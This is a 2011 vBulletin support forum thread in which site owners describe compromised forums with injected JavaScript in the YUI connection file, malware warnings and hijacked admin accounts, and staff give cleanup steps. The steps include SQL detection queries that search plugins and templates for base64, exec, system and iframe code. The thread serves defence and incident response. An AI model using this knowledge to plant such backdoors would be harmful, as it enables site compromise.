Virus or Maleware URL?

**stevieg** · Tue 13 Dec '11, 11:35am

you have been hacked, my limited knowledge has found a couple .js scripts in the clientscripts directory which allow a hacker remote access to my webserver. renamed my home directory, downloaded latest version and unzipped to a new clean home directory, ran the upgrade script and restored my smilies and .gif's and all seems to be clean now.

not sure what vulnerability theiry using that allows them to drop the .js scripts but the ones i found were a connection.js and a yui.1.30.js or something to that effect

Starting to get really annoyed at getting hacked all the time, I've updated to the latest Vbulletin version 3 times in the last three months (always the most current) just to remove active hacks from my forum home directory

Steve

**Wayne Luke** · Tue 13 Dec '11, 11:58am

We don't know how to fix the issue or what the attack vector is at this time. I keep asking people to open a support ticket so we can investigate. Until someone does, we can't tell you how your forum was infected. Until then try these methods here to clear it:

1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

3) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

4) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

5) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

Query for step 4 and 5 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

6) Run this query:
SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

**Wayne Luke** · Tue 13 Dec '11, 12:06pm

Originally posted by stevieg

you have been hacked, my limited knowledge has found a couple .js scripts in the clientscripts directory which allow a hacker remote access to my webserver. renamed my home directory, downloaded latest version and unzipped to a new clean home directory, ran the upgrade script and restored my smilies and .gif's and all seems to be clean now.

not sure what vulnerability theiry using that allows them to drop the .js scripts but the ones i found were a connection.js and a yui.1.30.js or something to that effect

Starting to get really annoyed at getting hacked all the time, I've updated to the latest Vbulletin version 3 times in the last three months (always the most current) just to remove active hacks from my forum home directory

Steve

Depends on which of your sites is being exploited. One is woefully out of date. For the other, load the YUI files off either Google's or Yahoo's servers. Settings -> Options -> Server Settings & Optimization Options -> Use Remote YUI. Though if you're on the latest version, there is probably another vector and they just use those files for their compromises.

**stevieg** · Tue 13 Dec '11, 4:15pm

It was the dorikaze.net domain that got hit, the end result was an infection with privacy.exe malware.

I'm not sure how they're getting in yet or even how to make sure it's gone (temporarily or permanently) because I only get the message on one of 6 computers, all the others are not showing the symptom. I did notice that java was starting in the tray icon so they're definitely using java to push the malware attack

Not sure how they're dropping the initial .js code into the clientscripts directory in the first place tho

**Devil_Dog** · Tue 13 Dec '11, 4:23pm

I've been hit as well. Will be sending a ticket.

**Wayne Luke** · Tue 13 Dec '11, 4:35pm

Seems to be some sort of exploit that is writing to the connection-min.js file within the clientscript/yui/connection folder. vBulletin doesn't have any native functions that write to this directory.

You should replace this file and contact your hosting provider to see if you can CHMOD your files to 0644. If you can, you should update the permissions on all your .js, php, html and xml files to this permission setting. You can also set the system to load the YUI files from a Remote Server under Settings -> Options -> Server Settings and Optimization Options.

You will also need to verify that you don't have any strange plugins that allow system access. This is covered in my list above under steps 4 and 5.

Also see: https://www.vbulletin.com/forum/show...ms-More-Secure

**IceFanatic** · Tue 13 Dec '11, 5:36pm

Originally posted by HeLLRZR

Several user are reporting that there anti-virus is reporting the following virus or malware when accessing our website, any ideas?

I am getting this exact attack right now.

Originally posted by Wayne Luke

Seems to be some sort of exploit that is writing to the connection-min.js file within the clientscript/yui/connection folder. vBulletin doesn't have any native functions that write to this directory.

You should replace this file and contact your hosting provider to see if you can CHMOD your files to 0644. If you can, you should update the permissions on all your .js, php, html and xml files to this permission setting. You can also set the system to load the YUI files from a Remote Server under Settings -> Options -> Server Settings and Optimization Options.

You will also need to verify that you don't have any strange plugins that allow system access. This is covered in my list above under steps 4 and 5.

Also see: https://www.vbulletin.com/forum/show...ms-More-Secure

Okay, I replaced that file and as far as I can tell, all my files are already at 644 CHMOD. I am no longer getting that attack from the forums themselves...but when I log into the admincp I still get it.

**Devil_Dog** · Tue 13 Dec '11, 11:33pm

Originally posted by IceFanatic

Okay, I replaced that file and as far as I can tell, all my files are already at 644 CHMOD. I am no longer getting that attack from the forums themselves...but when I log into the admincp I still get it.

Same problem. In the forums I'm fine but in admincp I'm still getting it.

**palmpedia** · Wed 14 Dec '11, 8:42pm

Same here - I used the suggested Remote YUI setting and it appears as if the warnings have ceased for users, but I see the connection to kokosina.in is still being attempted when I access the AdminCP --- Not a very comforting feeling.

**stevieg** · Wed 14 Dec '11, 10:38pm

Re-upload all the vbulletin files to your forum directory

**abqtj** · Sat 17 Dec '11, 11:12am

I've been hit as well.

Someone accessed the control panel using the Administrator user name 6 times in Oct and 1 time in Nov, each time updating, uploading, etc different plug ins (that aren't there anymore...not sure where/why).

Oh, and the Administrator password has been changed

**oddmud** · Sat 17 Dec '11, 11:29am

How do you know if you've been hit? And what hosts are you guys using?

**Wayne Luke** · Mon 19 Dec '11, 9:10am

Originally posted by abqtj

I've been hit as well.

Someone accessed the control panel using the Administrator user name 6 times in Oct and 1 time in Nov, each time updating, uploading, etc different plug ins (that aren't there anymore...not sure where/why).

Oh, and the Administrator password has been changed

Then you most likely have a backdoor installed somewhere. If the steps above don't point out the issue and let you solve it then you need to open your own thread or open a support ticket.

**abqtj** · Mon 19 Dec '11, 11:14am

I opened a support ticket, mentioned the admin password part, and it wasn't addressed.

vBulletin 4 End of Life

Virus or Maleware URL?

[CMS] Virus or Maleware URL?

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment